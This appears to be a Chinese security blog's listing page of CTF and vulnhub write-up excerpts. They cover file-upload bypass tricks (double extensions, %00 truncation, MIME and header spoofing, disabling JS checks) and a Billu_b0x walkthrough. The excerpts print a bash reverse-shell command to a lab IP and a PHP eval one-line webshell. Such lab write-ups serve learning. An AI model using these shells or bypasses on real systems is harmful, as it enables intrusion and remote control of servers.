webshell
大西瓜的安全之路
一个正在解ctf和漏洞复现的初级安全小白。
展开
-
vulnhub-Billu_b0x(getshell成功)
这一篇是接上一篇,上一篇没getshell。后面查了原因。然后紧跟上面一篇文章开始。开始弹shell。这里用到的命令。echo “bash -i >& /dev/tcp/192.168.1.113/4321 0>&1“ | bash需进行url编码,这里我使用小火狐进行编码,之前用站长工具能在线编码会出现头尾无法编码的现象, 编码后 :%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%2...原创 2022-03-29 14:39:15 · 1681 阅读 · 0 评论 -
vulnhub-Billu_b0x
题目:Billu_b0x攻击机:kali-linuxip地址:靶机:vulnhub-Billu_b0x开始解题:一、信息收集:nmap获取目标主机信息:这一步主要获取目标主机的端口信息等,先对整段进行扫描。这里刚开始没注意,靶机默认的事nat模式,我扫了半天一直扫不出来,大家做的时候注意一下。这里看到103这里开了22和80端口,基本确定是靶机了。再进一步探测端口信息。nmap -sS -sV -A -p- 192.168.1.103出原创 2022-03-27 16:33:51 · 807 阅读 · 0 评论 -
CTFHub技能书解题笔记-文件上传-双写后缀
打开题目 双写后缀绕过,这里适用于前后端都对文件的扩展名做了限制。我们可以通过双写文件的扩展名,达到绕过的目的。例如:xxx.php=>xxx.pphphp.开始解题。直接打开burpsuit进行抓包,上传马子。然后双写文件后缀。成功上传并执行。拿到flag。这里漏洞的原理就是,文件后缀名过滤的时候.pphphp。他会把中间的php当做危险用户名过滤为空,所以首字母的p和尾部的hp会再次组合为php,再进行执行的时候,我们这里仍...原创 2022-01-13 14:37:00 · 986 阅读 · 0 评论 -
CTFHub技能书解题笔记-文件上传-00截断
打开题目提示我们了解一下,php 5.2 00截断,查一下相关资料吧。截断原理:http://www.xxx.com/xx.jpghttp://www.xxx.com/xx.php%00.jpg => http://www.xxx.com/xx.php这里粗浅的说明一下本题所用到的原理,就是在.php文件后加上%00后接.jpg,这里我们就可以绕过对php文件的过滤。在执行时,%00会把后面的.jpg截断,所以执行的时候他执行的仍然是前面的.php文件。就可以实现我们的马子文件原创 2022-01-12 10:51:15 · 2083 阅读 · 0 评论 -
CTFHub技能书解题笔记-文件上传-文件头检查
打开题目到这里看起来没啥异样,上传个马子试试。看起来过滤了一些东西啊。这里继续上传马子看来也检测内容了。只允许上传图片格式,那做个图片马试试。这里图片马的指令:win:copy xxx.jpg/b + xxx.php 图片马.php/b 表示以二进制方式打开 /a 表示以ASCII方式打这里我生成的事php的马子,是因为本道题死一到后端过滤的。后端过滤我们需要把文件格式也改为JPG之类的。成功上传完毕shell连接成功。...原创 2022-01-07 16:17:29 · 996 阅读 · 0 评论 -
CTFHub技能书解题笔记-文件上传-MIME绕过
打开题目MIME绕过,先查查什么是MIME吧。MIME:当文件的扩展名是用一种应用程序来打开的方式类型,当扩展名文件被访问的时候,浏览器会自动指定应用程序来打开。有点绕口,通俗点就是,当我们上传的文件被判定为content-type字段时,可以通过抓包,将content-type字段改为常见的图片类型,例如inamge/gif,从而绕过。也就是我们上传php文件时,可以改为jpg、png之类的,然后实现绕过。开始测试。先正常测试下。发现确实不能上传..原创 2022-01-06 15:15:43 · 1406 阅读 · 0 评论 -
CTFHub技能书解题笔记-文件上传-js前端验证
打开题目。这里告诉我们是JS前端验证。那简单了。做法也很多了。做法一:禁用图片checkfilesuffix()白名单。既然是前端验证,那我们来看看网页源码。前端这里限制了,仅让jpg、png、gif格式的图片文件上传。那我们改一下不就好了禁止他检测。访问一下。完美运行了。就可以开始webshell连接了。这里就直接省掉了连接的过程。做法二:这里对网站图片的检测,利用的是java script。试试直接...原创 2021-12-30 11:49:55 · 1479 阅读 · 0 评论 -
CTFHub技能书解题笔记-文件上传-无验证
打开题目说是无验证。咋也不懂,直接打开看看。试试直接上传一句话木马。<?phpecho "hello";@eval($_POST['shell']);?>直接成功,这里访问试试。 成了。然后直接蚁剑连接进行连接。这里的url就是刚才咱们访问shell.php文件的url。连接密码就是中括号里的shell。这里可以随意更改。然后打开蚁剑,空白处右键添加数据。输入url和连接密码。点击测试连接。提示成功,就OK了。...原创 2021-12-29 10:15:22 · 302 阅读 · 0 评论